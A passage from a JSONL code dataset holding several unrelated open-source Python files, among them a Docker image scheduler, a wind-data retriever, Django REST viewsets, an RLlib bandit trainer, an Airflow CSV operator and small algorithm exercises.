os.getenv(\"FRONTEND_SERVER\")\nif not FRONTEND_ENDPOINT:\n raise ValueError(\"Please specify FRONTEND_SERVER environment variable!\")\nelse:\n FRONTEND_ENDPOINT = \"http://\" + FRONTEND_ENDPOINT + SCHEDULE_ENDPOINT\n\n\nclass Scheduler:\n\n def __init__(self):\n '''Initialize and retrieve all images from frontend server (controller)\n After that, the cached images are used for scheduling. \n In case a new image is added, the scheduler needs to be restarted by the controller!\n '''\n json.JSONEncoder.default = lambda self,obj: (obj.isoformat() if isinstance(obj, datetime.datetime) else None)\n self.schedule = {}\n try:\n self.schedule, _ = self.reguest_all_images()\n except requests.exceptions.ConnectionError as e:\n logging.error(\"Make sure that server you are trying to connect is up. %s\" % e)\n logging.error(\"Please start the scheduler again when the frontend server is up!\")\n logging.error(\"You can do this by executing 'docker restart scheduler'.\")\n exit(1)\n self.last_updated_images = {} #snapshot\n self.crawler = DockerCrawler()\n\n def reguest_all_images(self):\n '''Request all the images from the frontend server\n '''\n response = requests.get(FRONTEND_ENDPOINT)\n logging.info(response.status_code)\n schedule = response.json()\n logging.info(\"Requested image list is: %s \" % schedule)\n return schedule, response.status_code\n\n def run(self):\n self.updated_status = False\n for image, status in self.schedule.items():\n old_timestamp = self.last_updated_images.get(image)\n new_timestamp = self.crawler.get_last_update_timestamp(image)\n if old_timestamp == new_timestamp:\n # Image not updated\n logging.debug('Image has not been updated: %s', image)\n self.schedule[image] = 'old'\n elif old_timestamp is None and status == 'old':\n # old timestamp missing\n # do nothing, only save timestamp as current one\n logging.info(\"all images are same\")\n self.last_updated_images[image] = new_timestamp\n self.updated_status = True\n else:\n # Image updated\n logging.info('New tag for image %s detected at %s', image, new_timestamp)\n self.last_updated_images[image] = new_timestamp\n self.updated_status = True\n self.schedule[image] = 'updated'\n logging.info(\"All team images checked\")\n\n\ndef post_schedule(payload):\n headers = {'Content-type': 'application/json'}\n try:\n response = requests.post(FRONTEND_ENDPOINT, json = payload, headers=headers)\n logging.info('Finished sending image schedule. Response: %s' % response.status_code)\n if (response.status_code == 201):\n return {'status': 'success', 'message': 'updated'}\n if (response.status_code == 404):\n return {'message': 'Something went wrong!'}\n except requests.exceptions.ConnectionError as e:\n logging.error(\"Please specify Frontend server address! %s\", e)\n exit(1)\n return response.status_code\n\n\nif __name__ == '__main__':\n logging.info(\"Waiting for DB server to start\")\n logging.info(\"Waiting for the backend server to start\")\n backoff = int(os.getenv(\"SCHEDULER_STARTUP_BACKOFF\", default=30))\n frontend_backoff = int(os.getenv(\"FRONTEND_STARTUP_BACKOFF\", default=0))\n if backoff <= frontend_backoff:\n logging.debug(\"Sheduler should start after the frontend server. 
Adding small backoff\")\n backoff = frontend_backoff + 15\n time.sleep(backoff)\n\n scheduler = Scheduler()\n while(True):\n scheduler.run()\n updated_images = {}\n if scheduler.updated_status:\n for image, status in scheduler.schedule.items():\n if str(status) == 'updated':\n updated_images[image] = scheduler.last_updated_images[image]\n\n if updated_images:\n logging.info(\"Scheduler sending updated images: %s\", updated_images)\n post_schedule(updated_images)\n scheduler.updated_status = False\n else:\n logging.info(\"Images weren't updated yet. Idling...\")\n\n time.sleep(CRAWL_DOCKERHUB_FREQUENCY_SECONDS)\n","repo_name":"Hannajd/debs-2020-challenge-platform","sub_path":"scheduler/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11917726165","text":"#!/usr/bin/env python\n\nfrom datetime import datetime, timedelta\nfrom urllib import urlencode\nfrom urllib2 import urlopen\nimport json\nimport logging\n\nfrom django.utils.timezone import now\n\nfrom windstream.models import *\n\n# Span of hours to retrieve per query (maximum).\nHOURS_PER_QUERY = 4\n\nlogger = logging.getLogger('ebwind.retrieve')\n\ndef open_url(mill, start_timestamp):\n \"\"\"Open the url for a given mill.\n\n Will grab HOURS_PER_QUERY samples beginning at the last retrieved time.\n\n \"\"\"\n url = 'http://ds.windstream-inc.com/WSData/api/performancedata.json'\n params = { 'installid': mill.install_id,\n 'timezone': 'utc',\n 'start': start_timestamp.strftime(\"%Y-%m-%d %H:%M\"),\n 'span': \"{}hours\".format(HOURS_PER_QUERY)\n\n }\n full_url = \"{}?{}\".format(url, urlencode(params))\n return urlopen(full_url)\n\ndef retrieve_data(mill):\n \"\"\"Retrieve data saved since the most recent retrieval.\n\n If no data have been retrieved, go back to the earliest-known time at which data were\n gathered and retrieve everything.\n\n \"\"\"\n start_timestamp = None\n try:\n latest_sample = TurboMillSample.objects.order_by('-time_stamp')[0]\n logger.debug(\"Latest sample at %s\", latest_sample)\n start_timestamp = latest_sample.time_stamp\n except TurboMillSample.DoesNotExist:\n logger.debug(\"No sample for %s\", mill)\n # N.B., earliest known date (for Matthews Community Center) is 2012-11-29.\n start_timestamp = datetime(2012, 11, 29, 0, 0, 0)\n\n num_added = num_skipped = 0\n stop_timestamp = now()\n sixty_minutes = timedelta(hours=HOURS_PER_QUERY)\n logger.info(\"START %s\", start_timestamp)\n logger.info(\"STOP %s\", stop_timestamp)\n while start_timestamp < stop_timestamp:\n # The JSON feed prefixes thedata with a Unicode Byte Order Mark (BOM). 
This\n # decoding removes the mark.\n logger.info(\"Retrieving %s from %s\", mill, start_timestamp)\n raw = open_url(mill, start_timestamp).read().decode('utf-8-sig')\n data = json.loads(raw)\n\n for datum in data:\n try:\n sample = TurboMillSample.objects.get(location=mill, time_stamp=datum['TimeStamp'])\n logger.debug(\"ALREADY HAVE %s at %s\", sample.location, sample.time_stamp)\n num_skipped += 1\n except TurboMillSample.DoesNotExist:\n logger.debug(\"ADDING %s at %s\", mill, datum['TimeStamp'])\n num_added += 1\n TurboMillSample.objects.create(location=mill,\n time_stamp = datum['TimeStamp'],\n joules = datum['Joules'],\n watts_avg = datum['WattsAvg'],\n volts_avg = datum['VoltsAvg'],\n volts_peak = datum['VoltsPeak'],\n volts_min = datum['VoltsMin'],\n amps_avg = datum['AmpsAvg'],\n amps_peak = datum['AmpsPeak'],\n speed_avg = datum['SpeedAvg'] or 0,\n speed_peak = datum['SpeedPeak'] or 0,\n dir_mag = datum['DirMag'],\n dir_ang = datum['DirAng'],\n dir_cos = datum['DirCos'])\n start_timestamp += sixty_minutes\n\n logger.info(\"ADDED %d, SKIPPED %d\", num_added, num_skipped)\n\ndef retrieve():\n for mill in TurboMillLocation.objects.all():\n retrieve_data(mill)\n\nif __name__ == '__main__':\n retrieve()\n","repo_name":"nurkkala/ebwind","sub_path":"retrieve-data.py","file_name":"retrieve-data.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20762301013","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, filters, permissions, authentication, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.pagination import PageNumberPagination\n\n\nfrom .models import Post, Comment\nfrom .serializers import PostSerializer, CommentSerializer\nfrom .permissions import IsOwner\n# Create your views here.\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n \"\"\"\n A simple ViewSet for listing or retrieving users.\n \"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostSerializer\n pagination_class = PageNumberPagination\n filter_backends = [filters.SearchFilter]\n search_fields = ['title', 'date_pub']\n\n def get_queryset(self, pk=None):\n # TODO: refactor this method as we are using filter API\n # filter query with date_pub if provided\n # user can only get it's post\n if self.request.resolver_match.kwargs == {}:\n print(\">>>>\", 'first scope')\n date_published = self.request.query_params.get(\n 'date_published', None)\n if date_published is not None:\n queryset = Post.objects.filter(\n owner=self.request.user, date_pub=date_published)\n else:\n queryset = Post.objects.filter(owner=self.request.user)\n else:\n pk = self.request.resolver_match.kwargs['pk']\n date_published = self.request.query_params.get(\n 'date_published', None)\n if date_published is not None:\n queryset = Post.objects.filter(\n owner=self.request.user, date_pub=date_published, pk=pk)\n else:\n queryset = Post.objects.filter(owner=self.request.user, pk=pk)\n\n return queryset\n\n def list(self, request):\n print(\"List excuted\")\n queryset = self.filter_queryset(self.get_queryset())\n # Paginate the queryset\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n serializer = PostSerializer(page, many=True)\n\n # Create a dictionary with count, next, and previous URLs\n response = {\n 'count': paginator.page.paginator.count,\n 'next': 
paginator.get_next_link(),\n            'previous': paginator.get_previous_link(),\n            'results': serializer.data\n        }\n\n        return Response(response)\n\n    def retrieve(self, request, pk=None):\n        queryset = self.get_queryset(pk=pk)\n        serializer = PostSerializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def create(self, request, *args, **kwargs):\n        serializer = PostSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def update(self, request, *args, **kwargs):\n        print(\"Update executed\")\n        instance = self.get_object()\n        serializer = PostSerializer(instance, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def destroy(self, request, *args, **kwargs):\n        instance = self.get_object()\n        print(\"Delete Request\", instance)\n        instance.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n\n    pagination_class = PageNumberPagination\n    serializer_class = CommentSerializer\n\n    def authorization(self, request, instance):\n        # authorization\n        if instance.owner.id == request.user.id:\n            return True\n        else:\n            return False\n\n    def get_queryset(self):\n        queryset = Comment.objects.filter(\n            post=self.request.resolver_match.kwargs['post_id'])\n        return queryset\n\n    # list all comments of a specific post\n    def list(self, request, *args, **kwargs):\n        print(\"comments/list\")\n        queryset = self.get_queryset()\n        paginator = self.pagination_class()\n        page = paginator.paginate_queryset(queryset=queryset, request=request)\n        serializer = CommentSerializer(page, many=True)\n\n        # Create a dictionary with count, next, and previous URLs\n        response = {\n            'count': paginator.page.paginator.count,\n            'next': paginator.get_next_link(),\n            'previous': paginator.get_previous_link(),\n            'results': serializer.data\n        }\n\n        return Response(response)\n\n    def retrieve(self, request, *args, **kwargs):\n        # get specific comment\n        # url /comments/comment_id\n        print('comments/retrieve')\n        comment_id = self.request.resolver_match.kwargs['comment_id']\n\n        queryset = get_object_or_404(Comment, id=comment_id)\n        serializer = self.serializer_class(queryset)\n\n        return Response(serializer.data)\n\n    def create(self, request, *args, **kwargs):\n        print('Comments/create')\n        serializer = self.serializer_class(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def update(self, request, *args, **kwargs):\n        # url /comments/update/comment_id\n        print(\"comments/update\")\n        comment_id = self.request.resolver_match.kwargs['comment_id']\n        instance = get_object_or_404(Comment, id=comment_id)\n        serializer = self.serializer_class(instance, data=request.data)\n        if self.authorization(request, instance):\n            if serializer.is_valid():\n                serializer.save()\n                return Response(serializer.data)\n            else:\n                return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n        else:\n            return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n    def destroy(self, request, *args, **kwargs):\n        comment_id = self.request.resolver_match.kwargs['comment_id']\n        instance = get_object_or_404(Comment, id=comment_id)\n\n        if self.authorization(request, instance):\n            
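# Deletion is allowed only for the comment's owner, as checked by authorization() above.\n            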
instance.delete()\n            return Response(status=status.HTTP_204_NO_CONTENT)\n        else:\n            return Response(status=status.HTTP_401_UNAUTHORIZED)\n","repo_name":"Mitso98/django_labs","sub_path":"lab3/blog/blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241684775","text":"# An array intervals represents a collection of intervals, where a single interval is intervals[i] = [starti, endi].\n# Merge all overlapping intervals and return a non-overlapping array of intervals that exactly covers all the intervals in the input.\n#\n\nintervals = [[1,3],[2,6],[8,10],[15,18]]\nintervals = [[1,4],[4,5]]\nintervals = [[1,4],[2,3]]\n\n# Sort, then merge from small to large. Each interval only needs to be checked for overlap against the last one in res.\n# The key point is to sort first\ndef merge(intervals):\n    intervals = sorted(intervals)\n    res = [intervals[0]]\n\n    for interval in intervals[1:]:\n        if interval[0] <= res[-1][1]:\n            res[-1] = [min(res[-1][0], interval[0]), max(res[-1][1], interval[1])]\n        else:\n            res.append(interval)\n    return res\n\nprint(merge(intervals))","repo_name":"vandeppce/algorithm","sub_path":"9.greedy/56Merge.py","file_name":"56Merge.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70672228329","text":"class Book:\n    def __init__(self, author, title, shops=None):\n        self.author = author\n        self.title = title\n\n        self.shops = shops\n        self.shop = None\n\n    def get_prices(self):\n        for shop_object in self.shops:\n            shop_object.get_price()\n            if self.shop is None or shop_object.price < self.shop.price:\n                self.shop = shop_object\n","repo_name":"linnit/gr_watcher","sub_path":"gr_watcher/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31646554738","text":"import sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\n\nn_bit = 2**n\n\n# Bucket the bitmasks by their number of set bits\nflag_num = {}\nlog2_num = {}\nfor i in range(n+1):\n    flag_num[i] = []\n    log2_num[2**i] = i\n\nfor i in range(n_bit):\n    num = str(bin(i)).count('1')\n    flag_num[num].append(i)\n\n#bit operations\n# https://www.slideshare.net/KMC_JP/slide-www\n\n# Precompute the score g[j] for putting a set of rabbits in the same group\ng = [0]*n_bit\nfor i in range(2,n+1):\n    for j in flag_num[i]:\n        #get the lowest bit that is set to 1\n        left_flag = j & (-j)\n        #remove that lowest set bit, keeping the rest\n        right_flags = j - left_flag\n\n        g[j] = g[right_flags]\n        left = log2_num[left_flag]\n        for k in range(n+1):\n            if( ((right_flags >> k) & 1) > 0):\n                g[j] += a[left][k]\n\n#update the dp table\ninit = -1 * 150 * 10**10\ndp = [init] * n_bit\ndp[0] = 0\nfor i in range(1,n+1):\n    for j in flag_num[i]:\n        temp = init\n        k = (j-1) & j\n        while( k >= 0):\n            ### process each submask here ###\n            temp = max(temp, dp[k] + g[j-k] )\n\n            # break when k == 0\n            if(k==0):\n                break\n            #advance k to the next submask\n            k = (k-1) & j\n        dp[j] = temp\n\nprint(dp[n_bit - 1])\n","repo_name":"komajun365/competitive_programming","sub_path":"others/dpcon/u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29678948814","text":"def interpolation_search(arr, target):\n    \"\"\"\n    Perform interpolation search to find the target element in a sorted array.\n\n    Args:\n        arr (list): The sorted list to search in.\n        target (int): The element to search for.\n\n    Returns:\n        int: The index of the target element in the array, or -1 if not found.\n    \"\"\"\n    left, right = 0, len(arr) - 1\n\n    while left <= right and arr[left] <= target <= arr[right]:\n        
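# Only a single candidate index remains; checking it directly also avoids a zero division in the probe formula below.\n        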
if left == right:\n            if arr[left] == target:\n                return left\n            return -1\n        pos = left + ((target - arr[left]) * (right - left) // (arr[right] - arr[left]))\n\n        if arr[pos] == target:\n            return pos\n        if arr[pos] < target:\n            left = pos + 1\n        else:\n            right = pos - 1\n\n    return -1\n\nif __name__ == \"__main__\":\n    \n    # Test case\n    test_array = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]\n    target_element = 11\n    result = interpolation_search(test_array, target_element)\n\n    if result == -1:\n        print(f\"Element {target_element} is not present in the array\")\n    else:\n        print(f\"Element {target_element} found at position {result} in the array\")\n","repo_name":"N0vice17/DSA-with-Java","sub_path":"Searching_Algorithm/PYTHON/interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"69742261","text":"import time\ndef gcd_rec(a, b):\n\tmaxv = max(a, b)\n\tminv = min(a, b)\n\tremainder = maxv % minv\n\tif remainder == 0:\n\t\treturn minv\n\telse:\n\t\treturn gcd_rec(minv, remainder)\ndef gcd_cycle(a, b):\n\tmaxv = max(a, b)\n\tminv = min(a, b)\n\tgcd = maxv\n\twhile minv != 0:\n\t\tmaxv = minv\n\t\tminv = gcd % minv\n\t\tgcd = maxv\n\treturn maxv\nst1 = time.time()\nnum = gcd_rec(100, 54)\nstop1 = time.time()\nprint(\"time spent = \" + str((stop1 - st1) * 1000000) + \" num = \" + str(num))\nst2 = time.time()\nnum2 = gcd_cycle(100, 54)\nstop2 = time.time()\nprint(\"time spent = \" + str((stop2 - st2) * 1000000) + \" num = \" + str(num2))","repo_name":"Stepanvar/clean_prog","sub_path":"py/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14619850106","text":"#!/usr/bin/python3\nimport json\nimport sys\nimport sqlite3\nimport os\ndate_path = \"/home/user/Документы/homework/HW/dict.db\"\n\n\n\ndef create_db(date_path):\n    if not os.path.isfile(date_path):\n        with open(date_path,\"wb\") as file:\n            pass\n    return\n\ndef get_connect(date_path):\n    connect = sqlite3.connect(date_path)\n    return connect\n\ndef create_table(connect):\n    sql_dict = \"\"\"CREATE TABLE IF NOT EXISTS \"dictionary\"(\n    \"id\" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n    \"word\" TEXT NOT NULL,\n    \"lang_out\" TEXT NOT NULL,\n    \"lang_in\" TEXT NOT NULL,\n    \"translation\" TEXT,\n    \"meaning\" TEXT\n    );\"\"\"\n    cursor = connect.cursor()\n    cursor.execute(sql_dict)\n    connect.commit()\n\ndef send_date(element, connect):\n    #insert via a parameterized query; \"id\" is auto-incremented, so it is not listed\n    sql = \"\"\"INSERT INTO \"dictionary\"(\n    \"word\",\n    \"lang_out\",\n    \"lang_in\",\n    \"translation\",\n    \"meaning\"\n    )\n    VALUES(?, ?, ?, ?, ?);\"\"\"\n    cursor=connect.cursor()\n    cursor.execute(sql, (element['word'], element['lang_out'], element['lang_in'],\n                         element['translation'], element['meaning']))\n    connect.commit()\n\nif __name__ == \"__main__\":\n    path = \"/home/user/Документы/homework/HW/dict.db\"\n    create_db(date_path)\n    connection = get_connect(date_path)\n    create_table(connection)\n    element =({'word':'вечер','lang_out':'ru','lang_in':'en','translation':'evening',\n    'meaning':'вечеринка'})\n    connect=get_connect(date_path)\n    send_date(element,connect)\n","repo_name":"bogdanyy/homework","sub_path":"dict_db.py","file_name":"dict_db.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18141129935","text":"#!/usr/bin/env python3\n\nimport math\nfrom collections import deque\nfrom fractions import Fraction\n\nimport primesieve\n\n\nLIMIT = 80\nUSABLE = [True] * (LIMIT + 1)\n\n\ndef find_prime_factor_combos(p):\n print(f\"considering prime factor {p}...\")\n potential = [n for n in range(p, LIMIT + 1, p) if USABLE[n]]\n k = len(potential)\n combos = []\n current_sum = Fraction(0)\n arr = [0] * k\n for _ in range(2 ** k - 1):\n i = 0\n while arr[i] == 1:\n arr[i] = 0\n current_sum -= Fraction(1, potential[i] ** 2)\n i += 1\n arr[i] = 1\n current_sum += Fraction(1, potential[i] ** 2)\n if current_sum.denominator % p != 0 and current_sum <= 1 / 2:\n combo = tuple(potential[i] for i in range(k) if arr[i])\n combos.append(combo)\n combos = sorted(combos)\n rejected = set(potential).difference(*combos)\n for n in rejected:\n USABLE[n] = False\n if combos:\n print(f\"found {len(combos)} combos\")\n # for combo in combos:\n # print(combo)\n return [set(combo) for combo in combos]\n\n\ndef find_fat_combos(single_factor_combos):\n print(\"checking compatibility...\")\n # A FIFO queue for BFS. Each element is of the form\n #\n # (depth, combo, forbidden): (int, set, set)\n #\n # where depth is the next index in single_factor_combos to look,\n # combo is the current fat combo, and forbidden is the known set of\n # numbers forbidden by the combo.\n queue = deque()\n queue.append((0, set(), set()))\n maxdepth = len(single_factor_combos)\n while queue and queue[0][0] < maxdepth:\n depth, combo, forbidden = queue.popleft()\n p, p_combos = single_factor_combos[depth]\n existing_p_multiples = set(n for n in combo if n % p == 0)\n for p_combo in p_combos:\n if existing_p_multiples <= p_combo and not (p_combo & forbidden):\n new_combo = combo.copy()\n new_forbidden = forbidden.copy()\n new_combo |= p_combo\n new_forbidden |= set(range(p, LIMIT + 1, p)) - p_combo\n queue.append((depth + 1, new_combo, new_forbidden))\n fat_combos = [combo for _, combo, _ in queue]\n print(f\"found {len(fat_combos)} fat combos\")\n # for fat_combo in sorted(tuple(sorted(combo)) for combo in fat_combos):\n # print(fat_combo)\n return fat_combos\n\n\ndef find_result_combos(fat_combos):\n print(\"searching for results...\")\n choices = []\n n = 2\n while n <= LIMIT:\n choices.append((n, Fraction(1, n * n)))\n n *= 2\n results = []\n for combo in fat_combos:\n inverse_square_sum = sum(Fraction(1, n * n) for n in combo)\n remaining = Fraction(1, 2) - inverse_square_sum\n for n, contrib in choices:\n if remaining == contrib:\n combo.add(n)\n results.append(combo)\n break\n if remaining < contrib:\n continue\n combo.add(n)\n remaining -= contrib\n results = sorted(tuple(sorted(combo)) for combo in results)\n for result in results:\n print(result)\n print(f\"found {len(results)} results\")\n\n\ndef main():\n primes = primesieve.primes(3, LIMIT)\n single_factor_combos = []\n for p in reversed(primes):\n combos = find_prime_factor_combos(p)\n if combos:\n single_factor_combos.insert(0, (p, [set()] + combos))\n fat_combos = find_fat_combos(single_factor_combos)\n find_result_combos(fat_combos)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"152/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24852895140","text":"import logging\nfrom typing import Type\n\nfrom ray.rllib.agents.bandit.bandit_torch_policy import 
BanditTorchPolicy\nfrom ray.rllib.agents.trainer import Trainer, with_common_config\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.typing import TrainerConfigDict\n\nlogger = logging.getLogger(__name__)\n\n# fmt: off\n# __sphinx_doc_begin__\nDEFAULT_CONFIG = with_common_config({\n # No remote workers by default.\n \"num_workers\": 0,\n \"framework\": \"torch\", # Only PyTorch supported so far.\n\n # Do online learning one step at a time.\n \"rollout_fragment_length\": 1,\n \"train_batch_size\": 1,\n\n # Bandits can't afford to do one timestep per iteration, as that is extremely\n # slow because of metrics collection overhead. This setting means that the\n # agent will be trained 100 times in one iteration of RLlib.\n \"timesteps_per_iteration\": 100,\n})\n# __sphinx_doc_end__\n# fmt: on\n\n\nclass BanditLinTSTrainer(Trainer):\n \"\"\"Bandit Trainer using ThompsonSampling exploration.\"\"\"\n\n @classmethod\n @override(Trainer)\n def get_default_config(cls) -> TrainerConfigDict:\n config = Trainer.merge_trainer_configs(\n DEFAULT_CONFIG,\n {\n # Use ThompsonSampling exploration.\n \"exploration_config\": {\"type\": \"ThompsonSampling\"}\n },\n )\n return config\n\n @override(Trainer)\n def get_default_policy_class(self, config: TrainerConfigDict) -> Type[Policy]:\n return BanditTorchPolicy\n\n\nclass BanditLinUCBTrainer(Trainer):\n @classmethod\n @override(Trainer)\n def get_default_config(cls) -> TrainerConfigDict:\n return Trainer.merge_trainer_configs(\n DEFAULT_CONFIG,\n {\n # Use UpperConfidenceBound exploration.\n \"exploration_config\": {\"type\": \"UpperConfidenceBound\"}\n },\n )\n\n @override(Trainer)\n def get_default_policy_class(self, config: TrainerConfigDict) -> Type[Policy]:\n return BanditTorchPolicy\n","repo_name":"santosh-shetkar-katonic/ray-cluster","sub_path":"rllib/agents/bandit/bandit.py","file_name":"bandit.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1503727524","text":"import random\r\ndef game():\r\n print(\"Now, choose a color from the above list:\")\r\n chosen=input()\r\n if chosen not in color:\r\n print(\"You have not chosen from the above list\")\r\n return game()\r\n random_choice=(random.choice(color))\r\n print(random_choice)\r\n if random_choice==chosen:\r\n print(\"Hurray! 
You Won the Game\")\r\n exit()\r\n else:\r\n print(\"Ohh Noo..You failed to guess...!\")\r\ncolor=['Violet','Indigo','Blue','Green','Yellow','Orange','Red']\r\nprint(color)\r\ngame()\r\nprint(\"You have two more Chances to guess..\")\r\ngame()\r\nprint(\"You have one more Chance to guess..\")\r\ngame()\r\nprint(\"You lost the Game\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"manjula-s-13/Guessing-Game","sub_path":"Guessing game project.py","file_name":"Guessing game project.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12388817798","text":"import os\n\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport pandas as pd\n\nclass PandasCleanCsvOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n source_directory_path=\"\",\n destination_directory_path=\"\",\n data_definition = None,\n delimiter=',',\n *args, **kwargs):\n \"\"\" \n Process CSV files with Pandas\n Parameters:\n source_directory_path: \"String\"\n destination_directory_path: \"String\"\n data_definition: \"Dictionary\"\n delimiter: \"String\"\n \n \"\"\"\n\n super(PandasCleanCsvOperator, self).__init__(*args, **kwargs)\n self.source_directory_path = source_directory_path\n self.destination_directory_path = destination_directory_path\n self.delimiter = delimiter\n self.data_definition = data_definition\n\n def execute(self, context):\n action = f\"Read and Clean CSV {self.source_directory_path} to {self.destination_directory_path}\"\n self.log.info(f\"Start {action}\")\n\n dest_directory = self.destination_directory_path\n\n for root, dirs, files in os.walk(self.source_directory_path):\n\n for f in files:\n file_path = os.path.join(root,f)\n df = pd.read_csv(file_path, self.delimiter)\n\n if(self.data_definition):\n if(self.data_definition[\"columns\"]):\n df = df[self.data_definition[\"columns\"]]\n if(self.data_definition[\"rename\"]):\n df = df.rename(columns=self.data_definition[\"rename\"])\n if(self.data_definition[\"replace_na\"]):\n df = df.fillna(value = self.data_definition[\"replace_na\"])\n if(self.data_definition[\"convert\"]):\n df = df.astype(self.data_definition[\"convert\"])\n \n cleaned_file = os.path.join(dest_directory,f)\n df.to_csv(cleaned_file, index = False)\n self.log.info(f\"Saved {dest_directory}\")\n\n self.log.info(f\"End {action}\")\n ","repo_name":"joelatiam/UsDemographyImigrationPipeline","sub_path":"plugins/operators/clean_csv_with_panda.py","file_name":"clean_csv_with_panda.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39512975539","text":"from posthog.constants import FunnelOrderType\nfrom posthog.models.filters import Filter\nfrom posthog.queries.funnels import (\n ClickhouseFunnel,\n ClickhouseFunnelStrict,\n ClickhouseFunnelUnordered,\n)\nfrom posthog.queries.funnels.utils import get_funnel_order_class\nfrom posthog.test.base import BaseTest\n\n\nclass TestGetFunnelOrderClass(BaseTest):\n def test_filter_missing_order(self):\n filter = Filter({\"foo\": \"bar\"})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnel)\n\n def test_unordered(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.UNORDERED})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnelUnordered)\n\n def 
test_strict(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.STRICT})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnelStrict)\n\n def test_ordered(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.ORDERED})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnel)\n","repo_name":"PostHog/posthog","sub_path":"posthog/queries/funnels/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"44555103425","text":"# importing the module\nimport doctest\n\ndef id_to_seat(id_s):\n \"\"\"\n >>> id_to_seat(\"BFFFBBFRRR\")\n BFFFBBFRRR: row 70, column 7, seat ID 567.\n 567\n >>> id_to_seat(\"FFFBBBFRRR\")\n FFFBBBFRRR: row 14, column 7, seat ID 119.\n 119\n >>> id_to_seat(\"BBFFBBFRLL\")\n BBFFBBFRLL: row 102, column 4, seat ID 820.\n 820\n \"\"\"\n row=0\n exp=64\n for let in id_s[0:7]:\n if let == \"F\":\n row+=0\n elif let == \"B\":\n row+=exp\n exp//=2\n\n col=0\n exp=4\n for let in id_s[7:]:\n if let == \"L\":\n col+=0\n elif let == \"R\":\n col+=exp\n exp//=2\n\n id=row*8 + col\n print(f\"{id_s.strip()}: row {row}, column {col}, seat ID {id}.\")\n return id\n\n\n# invoking the testmod function\ndoctest.testmod(name='id_to_seat', verbose=True)\n\ndef main():\n print(\"ok\")\n f=open(\"input\", \"r\")\n lines=f.readlines()\n\n seats=list(range(1000))\n m=0\n for l in lines:\n x=id_to_seat(l)\n if x > m:\n m=x\n seats.remove(x)\n\n 